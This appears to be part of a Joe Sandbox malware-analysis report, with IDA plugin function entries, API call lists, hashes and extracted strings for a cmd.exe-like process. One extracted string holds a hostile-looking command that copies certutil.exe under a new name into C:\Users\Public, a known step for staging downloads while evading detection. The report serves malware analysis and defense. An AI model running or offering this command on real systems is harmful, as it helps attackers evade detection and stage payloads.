• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID:
• String ID: [...]$ [..]$ [.]$...$:
• API String ID: 0-1980097535
• Opcode ID: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
• Instruction ID: cd2c3e8337b032f703e9b47ed6e1c03cf246780f42a8231bfb6ff574bdc92315
• Opcode Fuzzy Hash: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
• Instruction Fuzzy Hash: A4327B73A08682C6EB24DF61A5443F973A0FF45B88F414135DA0D87699DF3EE549CB0A
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
• String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
• API String ID: 1795611712-3662956551
• Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
• Instruction ID: 21253b5ab56a8772e7899d5345f59ae2062f679e01beaf10c1c7c9d0614be432
• Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
• Instruction Fuzzy Hash: 71E19C73A08646C6EB209F64A8443FD66A1BF88788F544132DA0EC7795DE3EE50DC74A
APIs
• _wcsupr.MSVCRT ref: 00007FF6E944EF33
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944EF98
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944EFA9
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944EFBF
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF6E944EFDC
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944EFED
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F003
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F022
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F083
• FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F092
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F0A5
• towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF6E944F0DB
• wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F135
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F16C
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F185
  • Part of subcall function 00007FF6E94301B8: _get_osfhandle.MSVCRT ref: 00007FF6E94301C4
  • Part of subcall function 00007FF6E94301B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6E943E904,?,?,?,?,00000000,00007FF6E9433491,?,?,?,00007FF6E9444420), ref: 00007FF6E94301D6
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
• String ID: <noalias>$CMD.EXE
• API String ID: 1161012917-1690691951
• Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
• Instruction ID: 0a4195b632bf2243f85b50ace29cecfcafb1a5084cfe2153f0882de2ec3b86ec
• Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
• Instruction Fuzzy Hash: EE919123F08652CAFB159F60E8102BD6AA0AF49B59F448135DD0E827D5DF3EA84EC716
APIs
  • Part of subcall function 00007FF6E9433578: _get_osfhandle.MSVCRT ref: 00007FF6E9433584
  • Part of subcall function 00007FF6E9433578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E943359C
  • Part of subcall function 00007FF6E9433578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335C3
  • Part of subcall function 00007FF6E9433578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335D9
  • Part of subcall function 00007FF6E9433578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335ED
  • Part of subcall function 00007FF6E9433578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E9433602
• _get_osfhandle.MSVCRT ref: 00007FF6E94232F3
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF6E94232A4), ref: 00007FF6E9423309
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF6E9423384
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6E94411DF
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
• String ID:
• API String ID: 611521582-0
• Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
• Instruction ID: 85076ccb8cd57b1e8a4b0520062ee9e0d36cde55ca5ff42f6ec19b776ebd70f4
• Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
• Instruction Fuzzy Hash: C6A19C63B08612CAEB188F61A8543BD66A1FF4DB49F445135DE0EC7784DF3EA449C70A
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
• String ID: \\?\
• API String ID: 628682198-4282027825
• Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
• Instruction ID: 8b23b2eca7631305e547478c69c4c8f33402ff62c3f9f3d7d4656906ec964833
• Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
• Instruction Fuzzy Hash: 85E18C63A08682D6EB649F64D8943F963A0FF89749F404139DA0EC77D4EE3EE649C305
APIs
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 16309207-0
                                                                                                                                                                        • Opcode ID: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
                                                                                                                                                                        • Instruction ID: 949ee9b799f14aac2f643bc95a1cdabee99a18812a0dd246a870bcaebacf0362
                                                                                                                                                                        • Opcode Fuzzy Hash: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
                                                                                                                                                                        • Instruction Fuzzy Hash: CA227B63B08B86C6EB259F25D8543F963A0FF49B84F404135DA0E8BB95EE3DE149C706
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                                                                                                                                        • String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                        • API String ID: 3863671652-4137775220
                                                                                                                                                                        • Opcode ID: feb1bbf7feb49ee9d99dd0502c92dc49cdd19241ad0cb0e0275a55cbab1dd980
                                                                                                                                                                        • Instruction ID: 5189ddbaa255038b5fcee96fab94b60473c9722663eb10b7bf8067f3857c590a
                                                                                                                                                                        • Opcode Fuzzy Hash: feb1bbf7feb49ee9d99dd0502c92dc49cdd19241ad0cb0e0275a55cbab1dd980
                                                                                                                                                                        • Instruction Fuzzy Hash: ADE1DD63A09642C6FB64AF64A4587B822A0BF89745F054135DE0DC76E1EF3EE84DC70B
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                                                                                                        • String ID: $Application$System
                                                                                                                                                                        • API String ID: 3538039442-1881496484
                                                                                                                                                                        • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                                                                                        • Instruction ID: a484738f6046d36edee5ec239a463ff6d17902af7ea789fabd856eca673316d1
                                                                                                                                                                        • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                                                                                        • Instruction Fuzzy Hash: F0517873A08B41D6EB218F55A40077ABAA1FF89B44F458134DE4E83794EF3ED449CB09
                                                                                                                                                                        APIs
                                                                                                                                                                        • longjmp.MSVCRT(?,?,00000000,00007FF6E944048E), ref: 00007FF6E944DA58
                                                                                                                                                                        • memset.MSVCRT ref: 00007FF6E944DAD6
                                                                                                                                                                        • memset.MSVCRT ref: 00007FF6E944DAFC
                                                                                                                                                                        • memset.MSVCRT ref: 00007FF6E944DB22
                                                                                                                                                                          • Part of subcall function 00007FF6E9433A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6E944EAC5,?,?,?,00007FF6E944E925,?,?,?,?,00007FF6E942B9B1), ref: 00007FF6E9433A56
                                                                                                                                                                          • Part of subcall function 00007FF6E9425194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF6E94251C4
                                                                                                                                                                          • Part of subcall function 00007FF6E943823C: FindFirstFileExW.KERNELBASE ref: 00007FF6E9438280
                                                                                                                                                                          • Part of subcall function 00007FF6E943823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6E943829D
                                                                                                                                                                          • Part of subcall function 00007FF6E94301B8: _get_osfhandle.MSVCRT ref: 00007FF6E94301C4
                                                                                                                                                                          • Part of subcall function 00007FF6E94301B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6E943E904,?,?,?,?,00000000,00007FF6E9433491,?,?,?,00007FF6E9444420), ref: 00007FF6E94301D6
                                                                                                                                                                          • Part of subcall function 00007FF6E9424FE8: _get_osfhandle.MSVCRT ref: 00007FF6E9425012
                                                                                                                                                                          • Part of subcall function 00007FF6E9424FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9425030
                                                                                                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E944DDB0
                                                                                                                                                                          • Part of subcall function 00007FF6E94259E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9425A2E
                                                                                                                                                                          • Part of subcall function 00007FF6E94259E4: _open_osfhandle.MSVCRT ref: 00007FF6E9425A4F
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E944DDEB
                                                                                                                                                                        • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E944DDFA
                                                                                                                                                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6E944E204
                                                                                                                                                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6E944E223
                                                                                                                                                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6E944E242
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
                                                                                                                                                                        • String ID: %9d$%s$~
                                                                                                                                                                        • API String ID: 3651208239-912394897
                                                                                                                                                                        • Opcode ID: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
                                                                                                                                                                        • Instruction ID: 68ea2a9aaa8ef33d59e18617023b1008b9f306c066bf2d6286f3d7cef347b761
                                                                                                                                                                        • Opcode Fuzzy Hash: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
                                                                                                                                                                        • Instruction Fuzzy Hash: 05425D33A08682C6EB64AF3198513EE67A0FF85744F500135DA4DC7A99DF3EE549CB06
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                                                                                                        • String ID: COPYCMD$\
                                                                                                                                                                        • API String ID: 3989487059-1802776761
                                                                                                                                                                        • Opcode ID: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                                                                                                                                                        • Instruction ID: b19c15e80af4c31c34c67f2e6d59da32a5621f205c47d1eac8ce32fe79076bd4
                                                                                                                                                                        • Opcode Fuzzy Hash: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                                                                                                                                                        • Instruction Fuzzy Hash: 31F1C067A08786C2EB249F2594043BA67B0FF59B88F048135DE4EC7795EE3EE049C706
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                                                                                                        • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                                                                                                                                                        • API String ID: 55602301-2548490036
                                                                                                                                                                        • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                                                                                        • Instruction ID: ff955b42c9620b9a1095b925c3c17963fba24564c9da0eb7068c19b3b3e7b10c
                                                                                                                                                                        • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                                                                                        • Instruction Fuzzy Hash: E6A1AE33A19642D6EB20CF70E4483BA67A1FF94754F904136EA4E87694EF3DE548C70A
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3935429995-0
                                                                                                                                                                        • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                                                                                                        • Instruction ID: 38be0df2807263b075c5f66a05abc3329269bacd6d4fc801395c7ccb26dabb62
                                                                                                                                                                        • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                                                                                                        • Instruction Fuzzy Hash: 8261DE67A18792C2E714DFA6A404679BBA1FF89F54F058134EE4A837A0EF3ED409C705
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                        • Opcode ID: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                                                                                                                                                        • Instruction ID: 38d9de5160940e62cb7d396cd05fba0c79a3484c043ebd20156ea8d47d87b45e
                                                                                                                                                                        • Opcode Fuzzy Hash: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D91AD73A08682C6EB688F24D8103F976A0FF59B49F004135DA4EC7794EE3ED54AC706
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
